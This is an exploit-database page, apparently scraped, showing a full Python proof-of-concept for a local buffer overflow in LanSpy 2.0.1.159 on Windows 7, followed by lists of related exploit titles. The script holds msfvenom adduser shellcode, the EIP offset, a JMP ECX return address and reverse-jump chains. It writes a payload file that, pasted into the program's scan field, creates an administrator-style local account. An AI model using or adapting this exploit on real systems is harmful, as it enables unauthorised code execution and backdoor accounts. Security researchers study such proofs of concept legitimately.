Menu

Search for hundreds of thousands of exploits

"LanSpy 2.0.1.159 - Local Buffer Overflow"

Author

Exploit author

"Juan Prescotto"

Platform

Exploit platform

windows

Release date

Exploit published date

2018-12-19

Download file

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
#!/usr/bin/python

#------------------------------------------------------------------------------------------------------------------------------------#
# Exploit: LanSpy 2.0.1.159 - Local Buffer Overflow RCE(PoC)                                                                         #
# Date: 2018-12-16                                                                                                                   #
# Author: Juan Prescotto                                                                                                             #
# Tested Against: Win7 Pro SP1 64 bit                                                                                                #
# Software Download #1: https://www.exploit-db.com/apps/70a780b78ee7dbbbbc99852259f75d53-lanspy_setup_2.0.1.159.exe                  #
# Software Download #2: https://lizardsystems.com/download/lanspy_setup.exe                                                          # 
# Version: 2.0.1.159                                                                                                                 #
# Special Thanks to my wife for allowing me spend countless hours on this passion of mine                                            #
# Credit: Thanks to Gionathan "John" Reale (https://www.exploit-db.com/exploits/45968) for his work on the Denial of Service exploit #
# Steps : Open the APP > click on the scan field > paste in contents from the .txt file that was generated by this script            #
#------------------------------------------------------------------------------------------------------------------------------------#
# Bad Characers: \x00 thru \x20 and \x2c\x2d                                                                                         #
# EIP Offset: 680                                                                                                                    #
# Non-Participating Modules: lanspy.exe                                                                                              #
#------------------------------------------------------------------------------------------------------------------------------------#
# Run LanSpy with Administrative Rights, when exploit.txt contents are pasted into scan field and run a Local User will be created:  #
# User: Metasploit    Password: MyPassword12                                                                                         #
#------------------------------------------------------------------------------------------------------------------------------------#
# EIP overwrite --> JMP ECX --> Short Relative Reverse JMP --> Long Relative Reverse JMP --> NoPs --> Stack Adjustment --> Shellcode #
#------------------------------------------------------------------------------------------------------------------------------------#

#msfvenom -p windows/adduser USER=metasploit PASS=MyPassword12 --bad-chars \x00\x01\x02\x03\x04\x05\x06\x07\x09\x0a\x0b\x0c\x0d\x0f\x10\x11\x12\x13\x14\x1a\x1b\x1c\x1d\x1e\x1f\x2c --format python -v shellcode
#Payload size: 626 bytes

shellcode =  ""
shellcode += "\x89\xe5\xda\xd1\xd9\x75\xf4\x5b\x53\x59\x49\x49"
shellcode += "\x49\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43"
shellcode += "\x43\x43\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30"
shellcode += "\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30"
shellcode += "\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
shellcode += "\x39\x6c\x39\x78\x6b\x32\x65\x50\x45\x50\x73\x30"
shellcode += "\x31\x70\x6d\x59\x58\x65\x36\x51\x4f\x30\x43\x54"
shellcode += "\x6c\x4b\x56\x30\x70\x30\x6e\x6b\x63\x62\x54\x4c"
shellcode += "\x4e\x6b\x66\x32\x65\x44\x6c\x4b\x54\x32\x47\x58"
shellcode += "\x76\x6f\x68\x37\x30\x4a\x31\x36\x75\x61\x69\x6f"
shellcode += "\x6e\x4c\x75\x6c\x35\x31\x43\x4c\x55\x52\x36\x4c"
shellcode += "\x45\x70\x4b\x71\x78\x4f\x76\x6d\x65\x51\x69\x57"
shellcode += "\x6d\x32\x4c\x32\x33\x62\x53\x67\x4c\x4b\x61\x42"
shellcode += "\x42\x30\x6c\x4b\x31\x5a\x47\x4c\x6e\x6b\x50\x4c"
shellcode += "\x52\x31\x54\x38\x6a\x43\x47\x38\x75\x51\x7a\x71"
shellcode += "\x46\x31\x4c\x4b\x36\x39\x35\x70\x47\x71\x38\x53"
shellcode += "\x4e\x6b\x43\x79\x67\x68\x39\x73\x35\x6a\x73\x79"
shellcode += "\x4e\x6b\x34\x74\x6c\x4b\x75\x51\x6a\x76\x35\x61"
shellcode += "\x4b\x4f\x4c\x6c\x7a\x61\x48\x4f\x64\x4d\x67\x71"
shellcode += "\x68\x47\x37\x48\x6b\x50\x32\x55\x39\x66\x33\x33"
shellcode += "\x53\x4d\x4a\x58\x37\x4b\x43\x4d\x65\x74\x52\x55"
shellcode += "\x38\x64\x73\x68\x6e\x6b\x46\x38\x75\x74\x73\x31"
shellcode += "\x78\x53\x72\x46\x6e\x6b\x54\x4c\x30\x4b\x6e\x6b"
shellcode += "\x63\x68\x75\x4c\x36\x61\x58\x53\x6e\x6b\x47\x74"
shellcode += "\x6c\x4b\x35\x51\x68\x50\x4b\x39\x50\x44\x46\x44"
shellcode += "\x54\x64\x61\x4b\x73\x6b\x53\x51\x56\x39\x43\x6a"
shellcode += "\x53\x61\x6b\x4f\x79\x70\x63\x6f\x53\x6f\x62\x7a"
shellcode += "\x4e\x6b\x54\x52\x5a\x4b\x4e\x6d\x61\x4d\x72\x4a"
shellcode += "\x46\x61\x6c\x4d\x4d\x55\x78\x32\x57\x70\x55\x50"
shellcode += "\x63\x30\x52\x70\x62\x48\x34\x71\x6c\x4b\x32\x4f"
shellcode += "\x4b\x37\x59\x6f\x4e\x35\x6d\x6b\x6c\x30\x78\x35"
shellcode += "\x6e\x42\x71\x46\x61\x78\x59\x36\x6d\x45\x4f\x4d"
shellcode += "\x6f\x6d\x79\x6f\x4e\x35\x57\x4c\x57\x76\x43\x4c"
shellcode += "\x57\x7a\x4d\x50\x4b\x4b\x4d\x30\x61\x65\x43\x35"
shellcode += "\x4d\x6b\x31\x57\x54\x53\x44\x32\x52\x4f\x33\x5a"
shellcode += "\x75\x50\x72\x73\x4b\x4f\x69\x45\x73\x53\x50\x6d"
shellcode += "\x62\x44\x54\x6e\x51\x75\x44\x38\x65\x35\x31\x30"
shellcode += "\x66\x4f\x35\x33\x31\x30\x42\x4e\x33\x55\x61\x64"
shellcode += "\x77\x50\x52\x55\x63\x43\x50\x65\x61\x62\x67\x50"
shellcode += "\x52\x4d\x51\x75\x54\x34\x73\x51\x61\x63\x70\x70"
shellcode += "\x50\x6c\x70\x6f\x63\x59\x64\x34\x55\x70\x50\x4d"
shellcode += "\x31\x69\x50\x50\x70\x61\x74\x33\x44\x33\x54\x37"
shellcode += "\x42\x4f\x34\x32\x73\x54\x34\x71\x54\x72\x67\x50"
shellcode += "\x54\x6f\x32\x61\x51\x54\x77\x34\x71\x30\x76\x46"
shellcode += "\x36\x46\x31\x30\x30\x6e\x51\x75\x31\x64\x55\x70"
shellcode += "\x70\x6c\x42\x4f\x70\x63\x70\x61\x70\x6c\x70\x67"
shellcode += "\x72\x52\x30\x6f\x72\x55\x44\x30\x35\x70\x51\x51"
shellcode += "\x73\x54\x42\x4d\x55\x39\x72\x4e\x50\x69\x71\x63"
shellcode += "\x32\x54\x34\x32\x31\x71\x70\x74\x50\x6f\x54\x32"
shellcode += "\x64\x33\x51\x30\x30\x6d\x35\x35\x64\x34\x70\x61"
shellcode += "\x70\x73\x32\x50\x32\x4c\x70\x6f\x45\x39\x71\x64"
shellcode += "\x77\x50\x56\x4f\x72\x61\x43\x74\x63\x74\x63\x30"
shellcode += "\x41\x41"

if len(shellcode) > 633:
	exit("[+] Shellcode is too big! Shellcode must be smaller than 633 bytes")

sled = "\x90" * 8

#Necessary to allow shellcode room to operate
stack_adjust = "\x83\xec\x78" * 10

reverse_jmp_long = "\xe9\x5c\xfd\xff\xff"

reverse_jmp_short = "\x41\xeb\xf6\x41"

junk = "\x41" * (680 - len(sled) - len(stack_adjust) - len(shellcode) - len(reverse_jmp_long) - len(reverse_jmp_short))

#004040AD JMP ECX (lanspy.exe)
eip = "\xad\x40\x40"

payload = sled + stack_adjust + shellcode + junk + reverse_jmp_long + reverse_jmp_short + eip
try:
    f=open("exploit.txt","w")
    print "[+] Creating %s bytes evil payload.." %len(payload)
    f.write(payload)
    f.close()
    print "[+] File created!"
except:
    print "File cannot be created"
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
2020-12-02 "PRTG Network Monitor 20.4.63.1412 - 'maps' Stored XSS" webapps windows "Amin Rawah"
2020-12-02 "Microsoft Windows - Win32k Elevation of Privilege" local windows nu11secur1ty
2020-12-01 "Global Registration Service 1.0.0.3 - 'GREGsvc.exe' Unquoted Service Path" local windows "Emmanuel Lujan"
2020-12-01 "Pearson Vue VTS 2.3.1911 Installer - VUEApplicationWrapper Unquoted Service Path" local windows Jok3r
2020-12-01 "Intel(r) Management and Security Application 5.2 - User Notification Service Unquoted Service Path" local windows "Metin Yunus Kandemir"
2020-12-01 "10-Strike Network Inventory Explorer 8.65 - Buffer Overflow (SEH)" local windows Sectechs
2020-12-01 "EPSON Status Monitor 3 'EPSON_PM_RPCV4_06' - Unquoted Service Path" local windows SamAlucard
2020-11-30 "YATinyWinFTP - Denial of Service (PoC)" remote windows strider
Release Date Title Type Platform Author
2019-02-11 "IP-Tools 2.5 - Local Buffer Overflow (SEH) (Egghunter)" local windows "Juan Prescotto"
2018-12-19 "LanSpy 2.0.1.159 - Local Buffer Overflow" local windows "Juan Prescotto"
2018-05-28 "CloudMe Sync < 1.11.0 - Buffer Overflow (SEH) (DEP Bypass)" remote windows_x86-64 "Juan Prescotto"
2018-05-20 "Easy MPEG to DVD Burner 1.7.11 - Local Buffer Overflow (SEH) (DEP Bypass)" local windows "Juan Prescotto" 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected